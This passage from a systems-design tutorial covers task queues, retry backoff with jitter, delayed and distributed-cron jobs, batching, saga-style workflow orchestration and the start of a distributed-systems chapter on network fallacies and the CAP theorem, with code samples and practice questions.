The reason to separate workers from the web tier at all is that the two have opposite resource profiles and opposite scaling signals. A web server is latency-sensitive, short-lived per request, and scales on request rate. A worker is throughput-sensitive, potentially long-running, and scales on queue depth. Running them in one process means a burst of heavy jobs starves the request path of exactly the threads it needs to stay responsive.
TASK QUEUE ARCHITECTURE
web tier broker worker pool
+--------+ +-----------+ +-----------+
| API |--enqueue->| default |--------->| worker 1 | generic jobs
+--------+ +-----------+ +-----------+
| emails |--------->| worker 2 |
+-----------+ +-----------+
| video |--------->| worker 3 | CPU-heavy,
+-----------+ +-----------+ few, big boxes
|
+-----------+
| result |<-- workers write status/results here
+-----------+ so the API can answer "is it done?"
Separate queues per workload class -- NOT one queue for everything. A
40-minute video job and a 200 ms email must not compete for the same
workers, or every email waits behind a video.
That last point is the most commonly violated rule in task-queue design. Mixing job durations in one queue means short jobs inherit the latency of long ones — head-of-line blocking at the workload level. Separate queues (or separate worker pools bound to specific queues) give each class its own capacity and its own scaling behaviour.
# Celery: workload isolation expressed as routing.
app.conf.task_routes = {
"tasks.send_email": {"queue": "fast"}, # ms, high volume
"tasks.generate_report":{"queue": "slow"}, # minutes, low volume
"tasks.transcode": {"queue": "cpu"}, # long, resource-hungry
}
@app.task(
bind=True,
acks_late=True, # ack AFTER execution: a worker crash redelivers
# (at-least-once -- the task must be idempotent)
reject_on_worker_lost=True,
time_limit=600, # hard kill: prevents a hung job holding a slot
soft_time_limit=540, # raises an exception first, so the job can clean up
max_retries=5,
)
def generate_report(self, report_id):
with progress(self, report_id):
return build_report(report_id)
# Each pool is sized and shaped for its workload.
celery -A app worker -Q fast --concurrency=50 --pool=gevent # I/O-bound
celery -A app worker -Q cpu --concurrency=4 --pool=prefork # CPU-bound
# ^
# Concurrency for CPU work should track core count. Setting it to 50 on a
# 4-core box does not do more work -- it thrashes the scheduler and inflates
# every job's wall-clock time.
Two design questions come up in every task-queue system.
Where do results go? Fire-and-forget jobs need nothing. Jobs whose outcome the user waits for need a result backend — a row in a database or a key in Redis — that the API polls or pushes from. Storing large results in the broker itself is a common mistake: brokers are optimized for small messages in transit, not for holding megabyte payloads.
How big is a job? Prefer many small jobs over one large one. A job that processes 100,000 records in a single execution restarts from zero on any failure, cannot be parallelized, and will eventually exceed any timeout you choose. Splitting it into batches makes progress durable and parallelism possible.
# Anti-pattern: one enormous job. One failure at record 97,000 loses everything.
@app.task
def process_all_users():
for user in User.objects.all(): # 2 million rows, hours of work
process(user)
# Better: a coordinator fans out bounded chunks that fail independently.
@app.task
def process_all_users():
for chunk in chunked(User.objects.values_list("id", flat=True), 500):
process_user_chunk.delay(list(chunk)) # each chunk retries alone
@app.task(max_retries=3)
def process_user_chunk(user_ids):
for uid in user_ids:
process(uid) # ~500 units of lost work worst case
Key Takeaways
- Separate workers from the web tier: opposite resource profiles, opposite scaling signals.
- Give each workload class its own queue and pool, or short jobs queue behind long ones.
- Use late acknowledgment plus hard and soft time limits, and match concurrency to the workload type (threads for I/O, cores for CPU).
- Prefer many small jobs to one large one so failure loses a bounded amount of work and parallelism is possible.
🧪 Practice
- Design the queue topology for a system with password-reset emails, nightly invoicing, image thumbnails, and ML inference. State each queue's concurrency model.
- Explain what happens when a 4-core box runs
--concurrency=64for CPU-bound jobs.- Interview: A job takes 6 hours and fails at hour 5 for the third day running. How do you restructure it? (Hint: what would let day four start from hour 5 instead of hour 0?)
Job Retry and Exponential Backoff
Most job failures are transient — a timeout, a brief deadlock, a dependency restarting — so retrying is usually correct. The question is how, because a naive retry loop is one of the most reliable ways to turn a small incident into a large one.
The failure mode is the retry storm. A dependency slows down, every in-flight job fails, and every worker immediately retries. The dependency now receives its normal load plus all the retries, so it slows further, so more jobs fail, so more retries arrive. The system has built a positive feedback loop around its own failure, and it will not recover on its own even after the original trigger passes.
Exponential backoff breaks the loop by making each successive retry wait longer, giving the dependency room to recover:
IMMEDIATE RETRY EXPONENTIAL BACKOFF
t=0.0 1000 requests fail t=0 1000 fail
t=0.0 1000 retries t=1s 1000 retries
t=0.0 1000 retries t=2s 1000 retries
... load is UNBOUNDED t=4s 1000 retries
t=8s 1000 retries
The dependency never gets a t=16s 1000 retries
quiet moment to recover.
Load decays geometrically; the dependency
gets progressively longer quiet windows.
Backoff alone is not enough, because all the failed jobs retry at the same time — the retries are synchronized by the shared failure. Every retry wave arrives as a spike. Jitter — randomizing each delay — spreads them out, and it matters as much as the backoff itself.
import random
def backoff_delay(attempt, base=1.0, cap=300.0, strategy="full_jitter"):
"""Delay before retry number `attempt` (0-indexed)."""
exponential = min(cap, base * (2 ** attempt)) # 1, 2, 4, 8, ... capped
if strategy == "none":
return exponential # synchronized waves: avoid
if strategy == "full_jitter":
return random.uniform(0, exponential) # best general choice:
# maximum spread
if strategy == "equal_jitter":
half = exponential / 2
return half + random.uniform(0, half) # some spread, less
# variance in worst case
if strategy == "decorrelated":
prev = backoff_delay.last if hasattr(backoff_delay, "last") else base
d = min(cap, random.uniform(base, prev * 3))
backoff_delay.last = d
return d
# Retry schedule with full jitter, base 1s, cap 300s:
# attempt 0 -> 0.0-1s attempt 3 -> 0-8s
# attempt 1 -> 0.0-2s attempt 4 -> 0-16s
# attempt 2 -> 0.0-4s attempt 8 -> 0-256s
# Total worst-case span for 8 attempts: ~8.5 minutes.
# Celery: retry with backoff and jitter declared, not hand-rolled.
@app.task(
bind=True,
autoretry_for=(TransientError, requests.Timeout),
retry_backoff=2, # exponential base
retry_backoff_max=600, # cap the delay at 10 minutes
retry_jitter=True, # randomize -- do not skip this
max_retries=6,
)
def call_partner_api(self, payload):
resp = requests.post(PARTNER_URL, json=payload, timeout=10)
if resp.status_code in (429, 502, 503, 504):
# Honour the server's own guidance when it gives any.
raise self.retry(countdown=int(resp.headers.get("Retry-After", 30)))
if 400 <= resp.status_code < 500:
raise PermanentError(resp.text) # do NOT retry a client error
resp.raise_for_status()
Three constraints bound any retry policy.
A retry budget. Even with backoff, unlimited retries across many jobs can keep a dependency saturated. A budget — "retries may not exceed 10% of total requests" — is a global cap that backoff alone does not provide.
A deadline, not just an attempt count. If a job's result is worthless after five minutes, retrying it at minute forty is pure waste. Carry a deadline in the job and abandon work that can no longer matter.
def should_retry(job, attempt, max_attempts=6):
if time.time() > job["deadline"]:
return False, "deadline_exceeded" # the result is now worthless
if attempt >= max_attempts:
return False, "attempts_exhausted"
if retry_budget.exhausted(): # global protection for the
return False, "budget_exhausted" # dependency, across all jobs
return True, None
A circuit breaker for the hard-down case. When a dependency is fully down, even backed-off retries are wasted work and add load to something that cannot serve it. A breaker that trips after a threshold of consecutive failures fails subsequent jobs instantly, then probes periodically to detect recovery.
Key Takeaways
- Immediate retries create feedback loops that keep a struggling dependency down; exponential backoff decays the load geometrically.
- Jitter is not optional — without it, all retries stay synchronized and arrive as waves.
- Retry only transient failures; a 4xx repeated six times is still a 4xx.
- Bound retries by attempts, a deadline, a global retry budget, and a circuit breaker for the hard-down case.
🧪 Practice
- Compute the total elapsed time for 8 attempts with base 2s and a 120s cap, with and without full jitter (give the range).
- Explain concretely why 10,000 jobs retrying with identical backoff still overload a dependency.
- Interview: A partner API is down for two hours. Your retry policy is 10 attempts with exponential backoff. What happens to the queue, and what should happen instead? (Hint: how much work accumulates, and what does it all do the moment the partner recovers?)
Delayed and Scheduled Jobs
Not all work should run immediately. A trial ending in 14 days, a reminder in an hour, a retry in 30 seconds, an abandoned-cart email 3 hours after the last activity — all require executing a job at a future time, which is a different problem from executing it as soon as capacity allows.
The naive approach — a worker that polls a table every second for due jobs — works and is often good enough, but it has three weaknesses that matter at scale: polling load proportional to poll frequency rather than to work, timing precision bounded by the poll interval, and a full table scan or index sweep on every tick.
There are four mechanisms, and the right one depends on delay length and volume.
| Mechanism | Precision | Max delay | Scale |
|---|---|---|---|
| Broker-native delay (SQS) | Seconds | 15 minutes | Excellent, fully managed |
| Redis sorted set | Sub-second | Unbounded | Very good (millions) |
| Database polling table | Poll interval | Unbounded | Moderate; indexes matter |
| Time-bucketed queues | Bucket width | Unbounded | Excellent |
# 1. Broker-native: simplest, but note the 15-minute ceiling.
sqs.send_message(QueueUrl=Q, MessageBody=body, DelaySeconds=900) # max 900
# 2. Redis sorted set: the general-purpose delayed-job structure.
# Score = execution timestamp. Due jobs are always a range query at the
# front of the set, which is O(log n) regardless of how many are scheduled.
def schedule(job, run_at_epoch):
redis.zadd("delayed_jobs", {json.dumps(job): run_at_epoch})
def poll_due(now=None, batch=100):
now = now or time.time()
# Atomically claim due jobs so multiple pollers cannot take the same one.
lua = """
local due = redis.call('ZRANGEBYSCORE', KEYS[1], '-inf', ARGV[1],
'LIMIT', 0, tonumber(ARGV[2]))
if #due > 0 then redis.call('ZREM', KEYS[1], unpack(due)) end
return due
"""
for raw in redis.eval(lua, 1, "delayed_jobs", now, batch):
work_queue.enqueue(json.loads(raw)) # move it to the ready queue
-- 3. Database table: durable and queryable, but the index is what makes it
-- viable. Without it, every poll scans the whole table.
CREATE TABLE scheduled_jobs (
id BIGSERIAL PRIMARY KEY,
run_at TIMESTAMPTZ NOT NULL,
payload JSONB NOT NULL,
status TEXT NOT NULL DEFAULT 'pending',
attempts INT NOT NULL DEFAULT 0,
locked_by TEXT,
locked_at TIMESTAMPTZ
);
-- Partial index: only pending rows are ever queried, so the index stays small
-- even when the table holds years of completed jobs.
CREATE INDEX idx_due ON scheduled_jobs (run_at) WHERE status = 'pending';
-- Claiming rows safely across many pollers. SKIP LOCKED is the key: each
-- poller takes different rows instead of blocking on the same ones.
UPDATE scheduled_jobs SET status = 'running', locked_by = :worker,
locked_at = NOW()
WHERE id IN (
SELECT id FROM scheduled_jobs
WHERE status = 'pending' AND run_at <= NOW()
ORDER BY run_at
LIMIT 100
FOR UPDATE SKIP LOCKED
)
RETURNING id, payload;
4. TIME-BUCKETED QUEUES (the hierarchical timing wheel, simplified)
Bucket by minute; one queue per bucket. A scheduler moves whole buckets
into the ready queue as their time arrives.
now=10:00 10:01 10:02 10:03
[ ready ] <-- [ 47 jobs ] [ 3 jobs ] [ 1200 jobs ]
Cost per tick is O(1) in the number of SCHEDULED jobs -- you touch one
bucket, never the whole set. This is how schedulers handle tens of
millions of pending timers.
Three details separate a working scheduler from a broken one.
Long delays must survive restarts. An in-process setTimeout for 14 days is
lost on the next deploy. Anything beyond seconds belongs in durable storage.
"Due" jobs arrive in bursts. Ten thousand trials expiring at midnight all become due in the same second. Either spread the scheduled times deliberately (add jitter when scheduling) or rate-limit the dispatcher, or the scheduler becomes a load generator.
Cancellation must be possible. A reminder scheduled for a task that gets completed early must not fire. Store a job ID that can be cancelled, and — since cancellation races with dispatch — re-verify the precondition at execution time rather than trusting the schedule.
def send_trial_reminder(user_id, scheduled_for):
user = db.get_user(user_id)
# The world may have changed in the 14 days since scheduling. Always
# re-check preconditions at execution time; cancellation is best-effort.
if user.subscription_status != "trial" or user.trial_ends_at != scheduled_for:
return "stale, skipped"
send_email(user, "trial_ending")
Key Takeaways
- Delayed jobs need durable storage; in-process timers do not survive deploys.
- Redis sorted sets handle general delayed execution efficiently; time-bucketed queues scale to tens of millions of pending timers.
- For database-backed schedulers, use a partial index on pending rows and
FOR UPDATE SKIP LOCKEDso pollers do not contend.- Scheduled times cluster — jitter them — and always re-verify preconditions at execution time, because cancellation races with dispatch.
🧪 Practice
- Design storage for 50 million pending reminders spread over two years, with one-minute precision. Estimate the memory or storage required.
- Explain why
SKIP LOCKEDis essential when several pollers share one table, and what happens without it.- Interview: 100,000 subscription renewals all fall due at midnight UTC. What breaks and how do you fix it? (Hint: the fix can be applied when the jobs are scheduled, not only when they are run.)
Distributed Cron
Cron on a single machine is simple and dependable. Across a fleet it becomes a genuinely hard problem, because the property you need — "this runs exactly once at this time" — collides with the property you built the fleet for — "there are many identical machines".
Put a crontab on ten application servers and the nightly billing job runs ten times. Put it on one designated machine and you have reintroduced a single point of failure: when that machine is down at 02:00, billing silently does not happen, and nobody finds out until a customer asks.
THE DISTRIBUTED CRON PROBLEM
cron on every node cron on ONE node
+------+ +------+ +------+ +------+ +------+ +------+
| n1 * | | n2 * | | n3 * | | n1 * | | n2 | | n3 |
+------+ +------+ +------+ +------+ +------+ +------+
runs runs runs runs idle idle
\ | /
3 EXECUTIONS 1 execution -- unless n1 is down at 02:00,
(triple billing) in which case: 0 executions, silently
Three solutions exist, in increasing order of robustness.
1. A distributed lock. Every node tries to acquire a lock keyed by job and scheduled time; the winner runs. Simple and effective, with one important caveat: a lock with a TTL can expire while the holder is still working, letting a second node start. For jobs where a double execution is unacceptable, the lock must be paired with an idempotent job or a fencing token.
def run_with_lock(job_name, scheduled_slot, ttl_seconds, fn):
# Keying the lock by the SLOT, not just the job name, means a job that
# runs long cannot be started twice for the same scheduled time even
# after the lock expires.
key = f"cron:{job_name}:{scheduled_slot}"
token = str(uuid.uuid4())
if not redis.set(key, token, nx=True, ex=ttl_seconds):
return "another node holds this slot"
try:
# Extend the lease periodically for long jobs rather than setting a
# huge TTL, which would block the next slot after a crash.
with lease_renewal(key, token, ttl_seconds):
return fn()
finally:
# Release only if we still hold it -- never delete another node's lock.
redis.eval("if redis.call('GET', KEYS[1]) == ARGV[1] then "
"return redis.call('DEL', KEYS[1]) else return 0 end",
1, key, token)
2. Leader election. One node is elected leader through a consensus system (etcd, ZooKeeper, Consul) and runs all scheduled jobs; if it fails, a new leader is elected within seconds. This is more robust than ad-hoc locks and gives a single coherent place to reason about scheduling.
3. A dedicated scheduler service. A managed or purpose-built scheduler
(Kubernetes CronJob, cloud schedulers, Temporal, Quartz clustered mode) owns
the schedule and enqueues a message; ordinary workers execute it. This is the
strongest pattern because it separates deciding to run from running, and
the execution then inherits all the reliability of the task queue — retries,
DLQ, observability, backpressure.
# Kubernetes CronJob: scheduling is infrastructure, not application code.
apiVersion: batch/v1
kind: CronJob
metadata: { name: nightly-billing }
spec:
schedule: "0 2 * * *"
timeZone: "UTC" # ALWAYS pin this: DST makes local time
# schedules run twice or zero times a year
concurrencyPolicy: Forbid # never start if the previous run is going
startingDeadlineSeconds: 600 # if the controller was down, still start
# within 10 minutes -- otherwise SKIP the
# slot rather than run it hours late
successfulJobsHistoryLimit: 3
failedJobsHistoryLimit: 5
jobTemplate:
spec:
backoffLimit: 2
template:
spec:
restartPolicy: Never
containers:
- name: billing
image: billing:v4.2
args: ["--run-date=$(RUN_DATE)"] # pass the logical date in, so
# a re-run reproduces exactly
Beyond the mechanism, four properties distinguish scheduled jobs that survive production:
Idempotency by scheduled slot. Whatever the locking, assume a job may run
twice. Key its effects on the slot — billing_run_2026_08_25 — so a second
execution is a no-op.
Missed-run policy. If the scheduler was down at 02:00, should the 02:00 run
happen at 04:00? For billing, probably yes. For "send the daily digest",
probably no. Decide explicitly; startingDeadlineSeconds is that decision.
Overrun policy. If the hourly job takes 90 minutes, do you skip, queue, or
overlap? Forbid prevents pile-ups, which is the sane default.
Alerting on absence. The characteristic failure of scheduled work is that it does not run, which produces no errors and no logs. A dead-man's-switch — alert if job X has not reported success in the last 26 hours — is the only monitor that catches it.
def run_scheduled(job_name, slot):
# Idempotency keyed on the logical slot, enforced by the database.
try:
db.execute("INSERT INTO cron_runs (job, slot, started_at) "
"VALUES (?, ?, NOW())", job_name, slot)
except UniqueViolation:
return "already ran for this slot"
result = execute(job_name, slot)
db.execute("UPDATE cron_runs SET finished_at = NOW(), status = ? "
"WHERE job = ? AND slot = ?", result.status, job_name, slot)
heartbeat.report(job_name) # feeds the dead-man's-switch alert
return result
Key Takeaways
- Cron on every node multiplies executions; cron on one node reintroduces a single point of failure.
- Distributed locks keyed by scheduled slot are the simple answer; leader election is more robust; a scheduler service that enqueues work is strongest.
- Make jobs idempotent on the scheduled slot regardless of locking, since a lock TTL can expire mid-run.
- Decide missed-run and overrun policies explicitly, pin the timezone, and alert on absence — a job that never runs produces no errors.
🧪 Practice
- A lock has a 5-minute TTL and the job occasionally takes 8 minutes. Describe the failure and give two fixes.
- Design the missed-run policy for: nightly billing, an hourly cache refresh, a daily digest email, a weekly database vacuum.
- Interview: How do you find out that a nightly job silently stopped running three weeks ago? (Hint: you cannot alert on an error that was never raised — what can you alert on instead?)
Batch Processing Windows
Batch processing groups many items into one execution. It exists because per-item overhead — a network round trip, a transaction, an API handshake, a file open — is often far larger than the per-item work, so processing a thousand items together can cost barely more than processing one.
The gain is easy to quantify and usually surprising:
# Per-item cost dominated by round trips.
ITEMS, RTT_MS, PER_ITEM_MS = 100_000, 2.0, 0.05
one_at_a_time = ITEMS * (RTT_MS + PER_ITEM_MS) # 205,000 ms = 3.4 min
batched_1000 = (ITEMS / 1000) * (RTT_MS + 1000 * PER_ITEM_MS) # 5,200 ms
print(f"individual: {one_at_a_time/1000:.0f}s batched: {batched_1000/1000:.0f}s"
f" speedup: {one_at_a_time/batched_1000:.0f}x")
# individual: 205s batched: 5s speedup: 39x
#
# Nothing about the work got faster. The overhead was amortized, and that is
# where nearly all batching wins come from.
The cost is latency: an item that arrives at the start of a batch window waits for the window to close. Every batching decision is therefore a throughput versus freshness trade, and the right window is set by how stale the result is allowed to be, not by what is technically possible.
A batch should close on whichever of three conditions comes first:
class BatchAccumulator:
"""Flush on size, age, or byte limit -- whichever triggers first."""
def __init__(self, max_items=1000, max_age_s=5.0, max_bytes=1_000_000):
self.max_items, self.max_age_s, self.max_bytes = max_items, max_age_s, max_bytes
self.items, self.bytes, self.opened_at = [], 0, None
def add(self, item, size):
if not self.items:
self.opened_at = time.monotonic() # the clock starts on the FIRST
self.items.append(item) # item, not on the last one
self.bytes += size
return self.should_flush()
def should_flush(self):
if len(self.items) >= self.max_items:
return "size"
if self.bytes >= self.max_bytes:
return "bytes" # protects against a few huge items
if self.opened_at and time.monotonic() - self.opened_at >= self.max_age_s:
return "age" # ESSENTIAL: without it, a slow trickle of
# items is never flushed at all
return None
BATCH WINDOW TRADE-OFF
window throughput p99 latency good for
--------------------------------------------------------------
10 ms moderate ~15 ms interactive writes
1 s high ~1.1 s near-real-time aggregation
1 min very high ~65 s dashboards, metrics rollups
1 hour maximum ~65 min reporting, ETL
1 day maximum ~24 h billing, reconciliation
Pick the window from the freshness requirement, then verify the throughput
it yields is sufficient -- not the other way around.
Three problems recur in batch systems.
Partial failure. If item 700 of 1000 fails, what happens to the other 999? Three policies exist and each is right somewhere: all-or-nothing (transactional, simplest to reason about), best-effort (apply what works, collect failures), and split-and-retry (bisect the batch to isolate the bad item).
def process_batch(items):
try:
with db.transaction():
bulk_insert(items) # all-or-nothing
except BulkError:
if len(items) == 1:
dead_letter(items[0]) # isolated the culprit
return
# Bisect: two more attempts localize the failure logarithmically
# instead of retrying 1,000 items one at a time.
mid = len(items) // 2
process_batch(items[:mid])
process_batch(items[mid:])
Boundary correctness for time windows. A batch covering "yesterday" must define what happens to an event that occurred at 23:59:58 and arrived at 00:00:03. Use event time rather than processing time, allow a grace period for late arrivals, and make the job re-runnable so a corrected result can replace an earlier one.
-- Windowing on event time with a watermark for late data.
SELECT date_trunc('hour', event_time) AS window_start,
COUNT(*), SUM(amount_cents)
FROM events
WHERE event_time >= :window_start -- the logical window
AND event_time < :window_end
AND ingested_at < :window_end + INTERVAL '15 minutes' -- grace period
GROUP BY 1;
-- The job is keyed by window_start and is idempotent: re-running it after
-- the grace period replaces the earlier result rather than adding to it.
Batch size versus resource limits. Larger batches are not monotonically better. Memory, transaction log size, lock duration, and request payload limits all impose ceilings, and a batch that holds a database transaction open for minutes blocks other writers and inflates replication lag. The right size is usually found empirically and is smaller than the theoretical optimum.
Key Takeaways
- Batching amortizes fixed per-item overhead and commonly yields order-of- magnitude gains without making any individual operation faster.
- Its cost is latency; size the window from the freshness requirement.
- Flush on size, age, or bytes — whichever comes first — because the age trigger is what saves a slow trickle from never flushing.
- Decide a partial-failure policy explicitly, window on event time with a grace period, and cap batch size by transaction and memory limits, not theory.
🧪 Practice
- Compute the speedup for 1M items with a 5 ms round trip and 0.02 ms per item at batch sizes 1, 100, and 10,000. Where do the returns flatten?
- Implement bisecting retry and compute the number of attempts needed to isolate one bad item in a 1,024-item batch.
- Interview: A daily aggregation job produces different numbers each time it is re-run. What is wrong? (Hint: consider which clock decides whether an event belongs to yesterday.)
Long-Running Workflow Orchestration
Some processes span minutes, days, or months and involve many steps across many services: onboarding a customer, fulfilling an order, running a loan application. These cannot be a single job, because no process should hold state in memory for three days, and any failure at step seven must not restart from step one.
The naive implementation is a chain of queue messages: step one enqueues step two, which enqueues step three. It works until you need to answer ordinary questions — where is order 991 right now, why did it stop, what happens if step four fails after step three moved money — and discover that the workflow's state exists only as scattered messages with no coherent record anywhere.
Workflow orchestration makes the process itself a durable, inspectable object. Two architectural styles exist:
ORCHESTRATION (central brain) CHOREOGRAPHY (event chain)
+--------------+ [ OrderPlaced ]
| orchestrator | |
+--------------+ v
/ | \ payment service
v v v |
payment inventory shipping v
[ PaymentCaptured ]
+ State is in ONE place |
+ Easy to see and to change v
- The orchestrator is a inventory service
component to run |
v
[ StockReserved ] -> shipping ...
+ No central component
- The process exists nowhere; you
reconstruct it from logs
- Changing the order means changing
several services
Neither is universally right: choreography suits loosely coupled reactions, orchestration suits processes with a defined outcome that someone must be able to inspect and debug. Business processes with money in them are almost always better orchestrated.
The critical requirement for long-running workflows is durable execution: the workflow's progress is persisted after every step, so a crash resumes from the last completed step rather than the beginning. Modern engines (Temporal, Cadence, AWS Step Functions, Azure Durable Functions) provide this by recording an event history and replaying it to rebuild in-memory state after a restart.
# Temporal: ordinary-looking code that survives process death, deploys, and
# multi-day sleeps. The engine persists each step's result.
@workflow.defn
class OrderWorkflow:
@workflow.run
async def run(self, order: Order) -> str:
# Every activity result is durably recorded. A crash after this line
# resumes AFTER it -- the payment is never captured twice.
payment = await workflow.execute_activity(
capture_payment, order,
start_to_close_timeout=timedelta(seconds=30),
retry_policy=RetryPolicy(maximum_attempts=5,
backoff_coefficient=2.0),
)
try:
await workflow.execute_activity(
reserve_inventory, order,
start_to_close_timeout=timedelta(seconds=30))
except ActivityError:
# COMPENSATION: no distributed transaction exists across these
# services, so the workflow undoes the earlier step explicitly.
await workflow.execute_activity(refund_payment, payment)
return "failed: out of stock"
await workflow.execute_activity(ship_order, order,
start_to_close_timeout=timedelta(minutes=5))
# A three-day durable sleep. No thread, no memory, no timer process --
# the engine simply schedules the continuation.
await asyncio.sleep(timedelta(days=3).total_seconds())
await workflow.execute_activity(request_review, order)
return "completed"
Because there is no transaction spanning payment, inventory, and shipping, a workflow that fails partway must compensate — apply a semantic undo for each completed step, in reverse order. This is the saga pattern, and its defining constraint is that compensation is not rollback: a refund is a new transaction that leaves both the charge and the refund visible, and some steps (an email already sent) cannot be undone at all.
# The saga structure, independent of any engine.
async def run_saga(steps, context):
completed = []
try:
for step in steps:
await step.execute(context)
completed.append(step) # remember what needs undoing
except Exception as exc:
for step in reversed(completed): # compensate in REVERSE order
try:
await step.compensate(context)
except Exception:
# A failed compensation is an operational emergency: the
# system is now in a state no code path intended. Alert; do
# not swallow.
alert("compensation_failed", step=step.name, context=context)
raise
Three design rules follow.
Separate deterministic orchestration from side-effecting work. Engines
rebuild workflow state by replaying its history, which only works if the
workflow code produces the same decisions every time. Anything non-deterministic
— now(), random(), a network call — must live in an activity, not in the
workflow body.
Design compensations up front. Ask for every step: if a later step fails, what undoes this? Steps with no possible compensation should be ordered last, so they only occur once everything reversible has succeeded.
Make the workflow observable. The value of an orchestrator is partly that "where is order 991?" has an answer. Ensure state, current step, attempt counts, and failure reasons are queryable by support staff, not only by engineers with log access.
Key Takeaways
- Long processes need durable execution: progress persisted per step so a crash resumes rather than restarts.
- Orchestration centralizes process state and makes it inspectable; choreography avoids a central component but leaves the process implicit.
- Without distributed transactions, partial failure is handled by sagas — compensating actions applied in reverse order.
- Keep workflow code deterministic and push all side effects into activities; order irreversible steps last.
🧪 Practice
- Write the compensation for each step of: reserve inventory, charge card, generate label, send confirmation email. Which cannot be compensated?
- Explain why calling
datetime.now()inside workflow code breaks replay-based durable execution.- Interview: A saga's compensation step itself fails. What now? (Hint: no code path can fix this automatically — what must the system guarantee instead?)
<a id="8-distributed-systems-theory"></a>
8. Distributed Systems Theory
A distributed system is one where machines that fail independently must agree on things, over a network that can delay, reorder, or drop what they say to each other. This chapter covers the results that bound what is achievable — CAP, PACELC, FLP — the consistency models that describe what a system actually promises, the mechanisms for ordering events without a shared clock, and the consensus and transaction protocols that make agreement possible anyway.
<a id="81-fundamental-constraints"></a>
8.1 Fundamental Constraints
Before studying any protocol, it is worth knowing which problems are hard by nature rather than by poor engineering. The results in this subchapter are not obstacles to be optimized away — they define the shape of every solution that follows.
Fallacies of Distributed Computing
In 1994, engineers at Sun Microsystems catalogued the assumptions that developers new to distributed systems make without noticing. Each one is false, each one is comfortable, and each one produces a specific class of production incident. The list has aged remarkably well because the fallacies are not about technology — they are about the difference between a function call and a message sent to another machine.
The root cause is that distributed systems are usually presented through abstractions that look local. An RPC call looks like a method call. A remote object looks like an object. The abstraction is useful right up to the moment it fails, and then every difference it was hiding becomes your problem at once.
| # | Fallacy | Reality |
|---|---|---|
| 1 | The network is reliable | Packets drop; connections reset; NICs fail |
| 2 | Latency is zero | Cross-region round trips are ~100 ms, immovable |
| 3 | Bandwidth is infinite | Payload size becomes a scaling constraint |
| 4 | The network is secure | Anything on the wire is readable and forgeable |
| 5 | Topology doesn't change | Instances move constantly; addresses are temporary |
| 6 | There is one administrator | Many teams, many change windows, no single view |
| 7 | Transport cost is zero | Serialization, TLS, and egress all cost real money |
| 8 | The network is homogeneous | Different MTUs, protocols, proxies, and middleboxes |
# The abstraction that hides all eight fallacies at once.
user = user_service.get_user(user_id) # looks like a local method call
#
# What it actually does: DNS resolution (may be stale), TCP handshake (may
# time out), TLS negotiation (certs may have expired), serialization (schema
# may have changed), transmission (may be dropped), remote execution (may be
# overloaded), response transmission (may be lost after the work was done).
#
# Any of these can fail, and one of them -- a lost response -- is
# indistinguishable from a lost request. That single ambiguity is the source
# of most of this chapter.
# Writing it with the fallacies in view:
try:
user = user_service.get_user(
user_id,
timeout=0.5, # #2: latency is never zero; bound it
retries=2, # #1: the network is unreliable
idempotency_key=request_id, # a retry may duplicate the effect
fields=["id", "name", "tier"], # #3: do not fetch what you will not use
)
except ServiceUnavailable:
user = cached_user(user_id) or DEGRADED_USER # #1: plan for absence
The most consequential fallacy in practice is the first, and its sharpest form is this: a timeout tells you nothing about what happened. When a call times out, the request may never have arrived, may have arrived and be executing now, may have completed successfully with a lost response, or may have failed. The caller cannot distinguish these cases, ever, and the entire discipline of idempotency exists because of it.
WHAT A TIMEOUT ACTUALLY MEANS
caller callee
|---- request ---------X (a) never arrived -> safe to retry
|---- request -------------> (b) still running -> retry duplicates
|---- request -------------> (c) done, reply lost -> retry duplicates
|<---------X (d) failed remotely -> safe to retry
|
? All four look IDENTICAL to the caller: no response before the deadline.
Fallacy 2 deserves a number attached to it, because latency is the one constraint that no amount of money removes. Light travels roughly 200 km per millisecond in fibre, so a New York to London round trip cannot go below about 56 ms, and in practice runs 70-90 ms. That figure decides whether a design that requires three sequential cross-region round trips is viable before anyone writes code.
Key Takeaways
- The eight fallacies are assumptions that feel true locally and are false the moment a network is involved.
- Abstractions that make remote calls look local hide the failure modes until they occur, all at once.
- A timeout is ambiguous by nature: four different outcomes are indistinguishable to the caller.
- Latency is bounded by physics, so cross-region round-trip counts are a design constraint, not an optimization target.
🧪 Practice
- For each of the eight fallacies, name one concrete production incident it could cause.
- Compute the minimum theoretical round trip between Sydney and London, then explain why the real number is roughly double.
- Interview: A payment call times out. What do you do next, and what must be true of the payment API for your answer to be safe? (Hint: you cannot learn what happened from the timeout — so what must the callee provide?)
CAP Theorem
The CAP theorem, proved by Gilbert and Lynch in 2002, states that a distributed data store cannot simultaneously provide all three of:
- Consistency (C): every read receives the most recent write or an error. (This is linearizability, not the "C" of ACID — a persistent source of confusion.)
- Availability (A): every request to a non-failing node receives a non-error response.
- Partition tolerance (P): the system continues to operate despite messages being dropped between nodes.
The common phrasing — "pick two of three" — is misleading, and understanding why is the whole value of the theorem. Partitions are not a choice. Networks partition; cables are cut, switches fail, a routing change isolates a rack. A system that gives up P is a system that stops working when the network misbehaves, which is not an engineering position anyone holds deliberately.
So the real statement is narrower and far more useful: when a partition occurs, you must choose between consistency and availability. There is no third option, because the choice is forced by the situation itself.
THE FORCED CHOICE DURING A PARTITION
##### network partition #####
+----------------+ | +----------------+
| node A | X-----X-----X | node B |
| balance: 100 | | | balance: 100 |
+----------------+ | +----------------+
^ ^
client 1 writes client 2 reads
"withdraw 100"
CP choice: B refuses the read (or A refuses the write). No node serves a
request it cannot confirm is current. Correct, but UNAVAILABLE.
AP choice: both nodes serve their requests. B returns 100 -- which is now
stale. Available, but INCONSISTENT, and the two sides must be
reconciled once the partition heals.
The choice is driven entirely by what a wrong answer costs in that domain:
| Domain | Choice | Reasoning |
|---|---|---|
| Bank ledger, inventory | CP | A double-spend is worse than a brief error |
| Shopping cart | AP | A lost cart item is worse than a failed page |
| Configuration store | CP | Divergent config causes correlated failures |
| Social feed, likes | AP | Stale counts are invisible; downtime is not |
| Service registry | AP | A stale instance list beats no list (Chapter 6) |
# The choice, made explicit at the point where it is forced.
def read_balance(account_id, quorum_reachable):
if quorum_reachable:
return replica.read(account_id, consistency="QUORUM")
# The partition is here. Choose, per operation -- this is not a
# system-wide setting in any well-designed system.
if OPERATION_MODE == "CP":
raise ServiceUnavailable("cannot guarantee a current read")
else: # AP
value = replica.read(account_id, consistency="ONE")
return Stale(value, as_of=replica.last_sync_time) # label it stale so
# the caller can
# decide what to do
Three refinements separate a working understanding of CAP from a slogan.
